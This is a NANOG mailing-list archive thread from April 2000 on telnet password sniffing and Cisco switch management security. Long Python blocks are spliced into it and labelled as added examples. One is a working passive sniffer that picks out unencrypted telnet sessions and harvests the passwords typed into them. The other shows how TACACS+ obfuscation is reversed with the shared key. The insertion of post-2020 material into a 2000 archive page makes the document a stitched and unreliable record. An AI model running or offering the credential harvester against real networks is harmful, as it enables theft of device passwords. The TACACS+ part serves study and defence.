Merit Network

Discussion Communities: Merit Network Email List Archives

North American Network Operators Group


RE: ABOVE.NET SECURITY TRUTHS?

  • From: Roeland Meyer (E-mail)
  • Date: Fri Apr 28 17:57:53 2000

The private net is still subject to wire-tap tricks. If the switch supports SSH1, then that should be sufficient. MHSC.NET, and every host I set up for dot-com clients, gets a telnetd/ftpd-ectomy for free. If it needs CLI access, it gets SSH, or you have to go to the console. Even X11 and SMB sessions are forwarded through SSH. Given this sort of secure environment, plain-text Cisco sessions stand out like a sore thumb to a sniffer. They only have to look for the packets that are NOT encrypted. A private net is even worse; you are guaranteed that each packet is part of a network management session.

> -----Original Message-----
> From: Greene, Dylan [mailto:DGreene@NaviSite.com]
> Sent: Friday, April 28, 2000 2:10 PM
> To: 'Paul Froutan'; rmeyer@mhsc.com
> Cc: nanog@merit.edu
> Subject: RE: ABOVE.NET SECURITY TRUTHS?
> 
> Maybe I should read the entire message before responding.. hehe.. =)
> 
> A switched private management LAN resolves the cleartext problem.
> 
> SSH version 1 is apparently supported in 12.0 as well (never played w/ it,
> so dunno how well it works);
> 
> http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/120newft/120limit/120s/120s5/sshv1.htm
> 
> ..Dylan

| -----Original Message-----
| From: Paul Froutan [mailto:pfroutan@rackspace.com]
| Sent: Friday, April 28, 2000 4:46 PM
| To: rmeyer@mhsc.com
| Cc: nanog@merit.edu
| Subject: RE: ABOVE.NET SECURITY TRUTHS?
| 
| I don't think you can.  However, I use TACACS on all my switches and
| routers.  From what I know, TACACS passwords are encrypted using the key
| on your network devices and the TACACS server.  So, that, in combination
| with a private management LAN not accessible by your customers should
| lock down your network pretty effectively.  Any comments?
| 
| At 4/28/00 -0700, you wrote:
| 
| > > Exiled Dave
| > > Sent: Friday, April 28, 2000 1:10 PM
| >
| > > Let's think about this, Cisco in no way has such a flaw that would
| > > allow someone to 'root' and erase all the info on switches. The
| > > password was sniffed.
| >
| > Can one set up SSH on a Cisco 6509?
| 
| Paul Froutan                              Email: pfroutan@rackspace.com
| Rackspace, Ltd                       <http://www.rackspace.com>
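Roeland's point above is that a listener on the management LAN does not need to break anything: it only has to pick out the sessions that are not encrypted, and a telnet login to a switch hands over the password in the clear. The following is an added example (not code from the thread or from any vendor) that does exactly that triage over a list of TCP segments: it strips telnet option negotiation, recognises SSH by its version banner, scores the remaining payload by how much of it is printable text, and then harvests whatever the client types after a "Password:" prompt. The sample segments, addresses, ports, the "s3cr3t" password and the byte run standing in for SSH ciphertext are all constructed; the "User Access Verification" / "Password:" banner is what IOS prints on a telnet login, and the 0.9 printable-ratio threshold is an assumption for this sample, not a measured cut-off.

```python
"""Passive triage of management-LAN traffic: find the sessions that are NOT
encrypted and pull credentials out of them (added example, constructed data)."""
import hashlib
from collections import defaultdict

IAC, SE, SB, WILL, WONT, DO, DONT = 0xFF, 0xF0, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE  # RFC 854


def strip_telnet_options(data):
    """Drop IAC option negotiation so only the user-visible bytes remain."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == IAC and i + 1 < len(data):
            cmd = data[i + 1]
            if cmd == IAC:                       # escaped 0xFF data byte
                out.append(IAC)
                i += 2
            elif cmd in (WILL, WONT, DO, DONT):  # three-byte option commands
                i += 3
            elif cmd == SB:                      # subnegotiation runs up to IAC SE
                end = data.find(bytes([IAC, SE]), i + 2)
                i = len(data) if end < 0 else end + 2
            else:                                # two-byte commands (NOP, GA, ...)
                i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def printable_ratio(data):
    """Share of bytes that are printable ASCII or CR/LF/TAB; ciphertext scores low."""
    if not data:
        return 1.0
    ok = sum(1 for b in data if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return ok / len(data)


def flow_key(seg):
    """Direction-independent key so both halves of a TCP session land together."""
    src, sport, dst, dport, _ = seg
    a, b = (src, sport), (dst, dport)
    return (a, b) if a < b else (b, a)


def classify_flows(segments):
    """Return {flow_key: (kind, segments)}; kind is 'ssh', 'plaintext' or 'binary'."""
    flows = defaultdict(lambda: {"segments": [], "banner": False, "text": bytearray()})
    for seg in segments:
        f = flows[flow_key(seg)]
        f["segments"].append(seg)
        if seg[4].startswith(b"SSH-"):           # SSH identifies itself in the clear
            f["banner"] = True
        else:
            f["text"] += strip_telnet_options(seg[4])
    result = {}
    for key, f in flows.items():
        if f["banner"]:
            kind = "ssh"
        elif printable_ratio(bytes(f["text"])) >= 0.9:   # assumed threshold
            kind = "plaintext"
        else:
            kind = "binary"
        result[key] = (kind, f["segments"])
    return result


def harvest_credentials(segments):
    """For each plaintext flow, wait for a 'Password:' prompt from one side and record
    what the other side sends next, up to end of line -> [(device 'ip:port', typed)]."""
    found = []
    for kind, segs in classify_flows(segments).values():
        if kind != "plaintext":
            continue
        prompt_src, typed = None, bytearray()
        for src, sport, dst, dport, payload in segs:
            data = strip_telnet_options(payload)
            if b"assword:" in data:              # 'Password:' or 'password:' prompt
                prompt_src, typed = (src, sport), bytearray()
            elif prompt_src and (src, sport) != prompt_src:
                for byte in data:
                    if byte in (0x0D, 0x0A):     # Enter ends the secret
                        found.append((f"{dst}:{dport}", typed.decode(errors="replace")))
                        prompt_src = None
                        break
                    typed.append(byte)
    return found


CIPHERTEXT = bytes(range(128, 224))   # constructed stand-in for SSH ciphertext, not real SSH

# Constructed sample: a telnet login to 10.9.0.1 and an SSH-1 session to 10.9.0.2.
# Tuples are (src, sport, dst, dport, payload), in capture order.
SAMPLE = [
    ("10.9.0.5", 40000, "10.9.0.1", 23, bytes([IAC, DO, 0x01, IAC, DO, 0x03, IAC, WILL, 0x18])),
    ("10.9.0.1", 23, "10.9.0.5", 40000,
     bytes([IAC, WILL, 0x01, IAC, WILL, 0x03]) + b"\r\nUser Access Verification\r\n\r\nPassword: "),
    ("10.9.0.5", 40000, "10.9.0.1", 23, b"s3c"),
    ("10.9.0.5", 40000, "10.9.0.1", 23, b"r3t"),
    ("10.9.0.5", 40000, "10.9.0.1", 23, b"\r\n"),
    ("10.9.0.1", 23, "10.9.0.5", 40000, b"\r\nswitch>"),
    ("10.9.0.5", 40001, "10.9.0.2", 22, b"SSH-1.5-OpenSSH_2.1\r\n"),
    ("10.9.0.2", 22, "10.9.0.5", 40001, b"SSH-1.5-Cisco-1.25\r\n"),
    ("10.9.0.5", 40001, "10.9.0.2", 22, CIPHERTEXT),
    ("10.9.0.2", 22, "10.9.0.5", 40001, CIPHERTEXT),
]
```

Run against SAMPLE, `classify_flows` labels the 10.9.0.1 session plaintext and the 10.9.0.2 session ssh, and `harvest_credentials` returns the switch address with "s3cr3t". On a real management LAN the same logic runs over segments pulled from a capture with any pcap library; the classifier never touches the SSH flow beyond its banner, which is the whole point of Roeland's argument: the encrypted sessions are not what the sniffer is looking for.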

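Paul's quoted note says TACACS passwords are "encrypted using the key on your network devices and the TACACS server". What the TACACS+ protocol actually does with that shared key is XOR the packet body against a pad built from chained MD5 digests of the session id, key, version and sequence number; RFC 8907, which documents the protocol, calls this obfuscation rather than encryption, and a header flag (TAC_PLUS_UNENCRYPTED_FLAG) lets a misconfigured device send the body in the clear. The example below is added here and is not Cisco's, Rackspace's or any TACACS+ server's code: it builds a PAP Authentication START packet, applies and reverses the pad, and shows that with the flag set, or without the key, the password is sitting on the wire. The packet-type, flag and field constants are the values from RFC 8907; the session id, shared key, username, password, port and remote address are constructed for the example.

```python
"""TACACS+ body obfuscation (RFC 8907 section 4.5) on a constructed
Authentication START packet.  Added example, not any vendor's code."""
import hashlib
import struct

TAC_PLUS_VERSION = (0xC << 4) | 0x0      # major version 0xC, minor version 0
TAC_PLUS_AUTHEN = 0x01                   # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01         # header flag: body carried in the clear
HEADER = struct.Struct("!BBBBII")        # version, type, seq_no, flags, session_id, length


def pseudo_pad(session_id, key, version, seq_no, length):
    """MD5_1 = MD5(session_id, key, version, seq_no); MD5_n appends MD5_{n-1}.
    The pad is the concatenation of the digests, truncated to the body length."""
    fixed = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(fixed + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body, session_id, key, seq_no, version=TAC_PLUS_VERSION):
    """XOR the body with the pseudo-pad; applying it twice returns the body."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def authen_start(user, password, port="tty0", rem_addr="10.9.0.5"):
    """Authentication START, PAP flavour: the password travels in the data field."""
    u, p, r, d = (s.encode() for s in (user, port, rem_addr, password))
    # action=LOGIN(1), priv_lvl=1, authen_type=PAP(2), authen_service=LOGIN(1)
    return bytes([1, 1, 2, 1, len(u), len(p), len(r), len(d)]) + u + p + r + d


def build_packet(body, session_id, seq_no, key=None):
    """Prepend the 12-byte header.  key=None sets TAC_PLUS_UNENCRYPTED_FLAG,
    the configuration a sniffer on the management LAN hopes to find."""
    flags = 0 if key else TAC_PLUS_UNENCRYPTED_FLAG
    payload = obfuscate(body, session_id, key, seq_no) if key else body
    return HEADER.pack(TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, seq_no, flags,
                       session_id, len(body)) + payload


def parse_packet(packet, key=None):
    """Inverse of build_packet.  With the wrong key the body comes back as
    noise rather than an error; there is no integrity check in the pad."""
    version, ptype, seq_no, flags, session_id, length = HEADER.unpack_from(packet)
    payload = packet[HEADER.size:HEADER.size + length]
    if flags & TAC_PLUS_UNENCRYPTED_FLAG or key is None:
        body = payload
    else:
        body = obfuscate(payload, session_id, key, seq_no, version)
    return {"version": version, "type": ptype, "seq_no": seq_no, "flags": flags,
            "session_id": session_id, "body": body}


def parse_authen_start(body):
    """Split a START body back into its fixed fields and the four variable strings."""
    action, priv_lvl, authen_type, service, ul, pl, rl, dl = body[:8]
    fields, off = {}, 8
    for name, n in (("user", ul), ("port", pl), ("rem_addr", rl), ("data", dl)):
        fields[name] = body[off:off + n].decode(errors="replace")
        off += n
    return {"action": action, "priv_lvl": priv_lvl, "authen_type": authen_type,
            "service": service, **fields}


if __name__ == "__main__":
    body = authen_start("admin", "s3cr3t")                       # constructed values
    wire = build_packet(body, 0x1A2B3C4D, 1, key=b"shared-key")  # constructed key
    print("obfuscated, password visible:", b"s3cr3t" in wire)
    print("recovered with key:", parse_authen_start(parse_packet(wire, b"shared-key")["body"]))
    clear = build_packet(body, 0x1A2B3C4D, 1)
    print("unencrypted flag set, password visible:", b"s3cr3t" in clear)
```

Two things to take from running it. First, the protection is only as good as the shared key: anyone who has it (or recovers it from a device config) reverses the pad with the same three lines, and a listener who does not have it can still read every header field, including the session id and sequence numbers. Second, a device that sends with the unencrypted flag set is indistinguishable from one with the key configured except by looking at that flag, so a check on a management LAN capture should assert the flag is clear on every TACACS+ packet, not merely that the server is configured with a key.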
Merit Network, Inc.